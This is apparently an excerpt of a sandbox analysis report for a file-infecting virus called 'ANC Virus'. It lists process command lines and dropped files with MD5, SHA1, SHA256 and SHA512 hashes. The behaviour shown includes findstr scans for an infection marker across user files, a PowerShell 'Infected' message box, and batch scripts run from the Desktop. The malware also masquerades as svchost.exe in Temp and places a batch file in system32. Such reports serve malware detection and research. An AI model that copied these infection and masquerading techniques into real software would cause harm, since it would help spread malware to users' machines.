C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\LockApprove.asf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MountEnter.css"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MountResolve.wax"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\MoveHide.mid"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\PushWrite.wmv"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ReadSkip.m1v"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ReceiveWatch.php"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\RepairResize.html"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SaveDeny.jpg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SearchBlock.mp2v"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SearchStart.png"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SendDismount.emf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SetConvert.asp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SplitCopy.xml"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SwitchDisconnect.jpg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\SwitchStop.ps1"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\UndoInitialize.ppsm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\UnregisterWatch.i64"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\WaitPublish.xht"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "[reflection.assembly]::LoadWithPartialName('System.Windows.Forms')|out-null;[windows.forms.messagebox]::Show('Infected with ANC Virus')"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\UnregisterStop.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\StepGrant.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ResizeUnlock.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ProtectLimit.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ConvertFromPing.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ClearLimit.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\PingShow.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\ResizeClose.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
cookie_exporter.exe --cookie-json=1140
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
Network
Files
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 0ccc31c7e5303f7c764aed3b6bfc2497 |
| SHA1 | 4871f2de6d55f15e2b033e44d04feb35e285c5d4 |
| SHA256 | 45b4a9490690a0ebca87c7293583b8ff16c61a36659c1831372476370b24280b |
| SHA512 | bbfddbc6d3543789db4ad1240b9a03e14cb3c2934b3decdf4bb77ccab66849340a31d3a11373d4f73aecefc42f4e016961f40d7bef3cc7ca34fb740b3bcbe143 |
C:\Users\Admin\AppData\Local\Temp\svchost.exe
| MD5 | 24a2cfa58d0c6106dc8f85ce4d4cb1b0 |
| SHA1 | 8a2073974e98d3fe7b179a674d7d42a003fb900d |
| SHA256 | d433e44ca87ba06b144f0a21647d3a931ab1774b98a07f26fbba9db4a4a1b677 |
| SHA512 | 28f176c37ff890ca3c0923e09704ebf9cf57f47e434d823d3561c33bc0bf0dc8156ad3313d730741fe0578b60d7d02f31285ade6200517d6e160fd5ddf679e4d |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mkde5ylu.tp4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3260-25-0x000002685CFD0000-0x000002685CFF2000-memory.dmp
C:\Windows\system32\balls.bat
| MD5 | ef7d6ce54f271156986cadcdae2c5eb1 |
| SHA1 | b680bf212b98e41dc30d84007e65ff1f090cf293 |
| SHA256 | ae67293a910698f118364e718806dc2be86085c68c3ee814579b20bd0e26c927 |
| SHA512 | 193e1d6a26d38607bdd13ef2821274cbe48a8fbf5067ea4f93ff66b791b87576dfea294ccc8dd1b85ea5c349ae08f749724606714690d5c45811dcc39c68f764 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5f4c933102a824f41e258078e34165a7 |
| SHA1 | d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee |
| SHA256 | d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2 |
| SHA512 | a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | da255d6e827f6f566661652c5f08620e |
| SHA1 | 27a36eb35d67c0ef70bf71d5be1a989641808d65 |
| SHA256 | a3b85d0066eeb4d7f0ce0c48eacbb922d6b48fd108c611f7cd05835fc0acc956 |
| SHA512 | 7aa629b4929885cf5c42bc1d280083dbd31ccac6425f6757cfce07dbbe4ad33a85fff1d4f8907505dc13f710d4308ee06d1fbc77e365b6b0392c8328b2fc99d0 |
C:\Users\Admin\AppData\Local\Temp\1945869879.bat
| MD5 | 592ea555e801f38b1bf67cb9d991ab15 |
| SHA1 | d47540e67bf8e1e47053007f0bff43e056039c1a |
| SHA256 | 38f929deeaa986df14301e9de15bed8fe14343fa0d20612adb7f92b5149e44c5 |
| SHA512 | ed9e0ab76c5a988d467825eb4dc8481622fc19c9a1ebffadae06290f7c9f81e281b54ec1f9500aedff81e6da0f1b6d852f720da1d43712b2c661b54db3b729a7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3f40d651f2dcf866a02a27bd227ca4ee |
| SHA1 | a9e6a4b46d40bd28e18e093a89a8d44b3df321d7 |
| SHA256 | 6977cb39ce8bbebd2cee5cbbb4a55aef8f424f5d7b3e461b7ecfea5c285b0a84 |
| SHA512 | 15809990ad18189c8283ce573312efb7269a464e88697e4c2f0f140d322bca0a9ee5d83dc62c6b1effe72c031682f76835029080caa6d9cf775a70e84009c57f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c7f3909baaf041fe87d52e79e8a93275 |
| SHA1 | 6ba2b9e2f4617a770a3de5f10520bd6d376845fa |
| SHA256 | ed4b0405042568c69fea8059e85ca1955f411d5e5f5c54918a796173ac0b8d9c |
| SHA512 | 5c9c58e401423685d887056bcd474c45d95897b32831e57ccaf27256860533b1c47cd557657af90e2d64a67b754cd65a10dbce400de43222851995a303e37400 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7355f4a1d4e1a2519a4a60ee11f1d192 |
| SHA1 | 8802bbb71f3e8947c02a7d835b31c7abf4289780 |
| SHA256 | 2fac16b31607552d8f35d56232cb768ddc2f393c6162d243482466527005f4e3 |
| SHA512 | 7186100f86bc7a161667583daa5419d3b75acf620892610e0fab26866a4a300795a270bb5009b7af115216569c0d854fe1e3a68121af6f734fc16f7bfaed2d33 |
C:\Users\Admin\Microsoft-Edge\Rar.exe
| MD5 | 16659ae52ce03889ad19db1f5710c6aa |
| SHA1 | 66b814fe3be64229e2cc19f0a4460e123ba74971 |
| SHA256 | 0b1866b627d8078d296e7d39583c9f856117be79c1d226b8c9378fe075369118 |
| SHA512 | f9dd360c3a230131c08c4d5f838457f690ed4094ec166acd9f141b7603f649cfa71a47ea80e9ff41b8296246bdc1c72a75288f9a836c18431e06c2e8e3fc8398 |
C:\Users\Admin\Microsoft-Edge\tmp.rar
| MD5 | d678be482106e9cb0d1df0baf98292e3 |
| SHA1 | c897f7eca06a38fb3a8cb0f05d6ad8f16f9438e2 |
| SHA256 | 72a700cd72f7662220e6154f00fe8c4194bb83e3556b490550dd746cebb02891 |
| SHA512 | f25e4855df1241245c8f5de1aa6372395508269da83a71c44f24a85e78e57b53f5b2d196526f9d868d42deaf9882a986056e901d91702dea64bfc09148e2415c |
C:\Users\Admin\Microsoft-Edge\main.bat
| MD5 | 40da2696cc3adcf1c73aa068f5a953f3 |
| SHA1 | cdfdb2f99d5c5af339af8ebc84c5dec05e5a3ac9 |
| SHA256 | c71957fc06a9c8569d9d6769a5e5c8a0a2ca0f27a6c5906a8e27898eabbe8ea4 |
| SHA512 | 6240007efc2436ebad1a5e8de494b566c64959dd89c973bf26f97b64e2be8e1d083e3835d80c68571ac3410bdb9d65cac540047e3f0c84afa263bfd0465f1cc9 |
C:\Users\Admin\AppData\Local\Temp\15623_3106930297.tmp
| MD5 | af2025c41ef1bf77c565cec9d2171608 |
| SHA1 | 4dd689ad03543c85bc22ab0a4134c3fa65779af1 |
| SHA256 | 6c709c40aba28cb272e1ad7289a6b7eeefe7e3f471cce7ea7b48a0707cba6186 |
| SHA512 | 7dd1fbaa04a58e0ff69ad363408c313b54a383e761317f031dd764002b6fb9a84981b98506b2b87f1ce120123c8dcc2b1b994f6e23dba83324855a09e3393637 |
C:\Users\Admin\AppData\Local\Temp\15623_3106930297.tmp
| MD5 | 6be01d3cb84e03bc55ee35ed0647c09a |
| SHA1 | 3d45c143f1850727a5d11d1a8b5c206523fcc024 |
| SHA256 | 4799f8aa917927dde4a26f3f434d4a57994dc30c78cc3511fac1cbab6bd24dc9 |
| SHA512 | c689ec735acdd91512f892c966e541e3bc5e713f7e2d7e7bf29d8450576a93a1b00b0dfbe0bf26217a6151e6e0f457da164d0c50e4874d5a0372a0b61a1623c9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3ec725b51b7dc5a5315cba7c430bcdab |
| SHA1 | fea1075c521710c02a66613aa052df5bb2425f52 |
| SHA256 | af3a1b94c4e6bf79ae14e27a9486837169fcfafa04d8cae03b9330771ef3b7fb |
| SHA512 | 9f7c1da86d663f3cb4309706a754f3d516f49e6a7dcef664a9712af75f7546355945b564ef4815c2f2b3d27a4121b88813bfe5a8910d10de8c192b2830462115 |
C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd
| MD5 | cf17b717a1f6b30084a58fde8614f021 |
| SHA1 | 76a9e97828f57e7e605e3eba02691a8a629ba10d |
| SHA256 | 298894785378ab2dbf591529c029c499e1f42692a6fc36075586e6f6bf6e3c8a |
| SHA512 | 4d9a49e6d886513aa85ee9e08850c7bb170c969cbf50365670b24ff7f2ec646e876cd211da9bdd36cc785439174e757270a75ab4704b568814b17a3f6c246f69 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7fce898bbf7d2713eeb746f44fe7a289 |
| SHA1 | bbb88596ebc97ddb3c83a1e0238c23110ae53586 |
| SHA256 | 0404d189236865e4d43a47c354d44c5ede1c10f4c3357d428f4af47cf9655839 |
| SHA512 | 84cd1e360e266b1ef6400c756c2035f011f9927f205fc250b758257fab9c710e7f19a288c2812eece27fa1d650d27f45617f6d8cb9cb53778c8fedca608ec4d0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\Desktop\CopyEnter.sql
C:\Users\Admin\Desktop\UnregisterStop.bat
C:\Users\Admin\Desktop\StepGrant.bat
C:\Users\Admin\Desktop\ResizeUnlock.bat
C:\Users\Admin\Desktop\ProtectLimit.bat
C:\Users\Admin\Desktop\ConvertFromPing.bat
C:\Users\Admin\Desktop\ClearLimit.bat
C:\Users\Admin\Desktop\PingShow.bat
C:\Users\Admin\Desktop\ResizeClose.bat
\??\pipe\crashpad_2436_CYUTHVTWSFPHPHNZ
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5c0de2.TMP
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\e819d3d5-3d8b-4ca1-9eb8-9b0a32b9b2c6\index-dir\the-real-index~RFe5c0e11.TMP
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\e819d3d5-3d8b-4ca1-9eb8-9b0a32b9b2c6\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\ff852b6c-4618-4c26-97b0-e82ca5000671\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\ff852b6c-4618-4c26-97b0-e82ca5000671\index-dir\the-real-index~RFe5c0e11.TMP
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\6e410e6e-9071-4293-9cc4-5eb496c5ff82\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnWebGPUCache\data_1
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000063
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000065
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006a
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000069
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000068
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000067
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000066
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000064
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat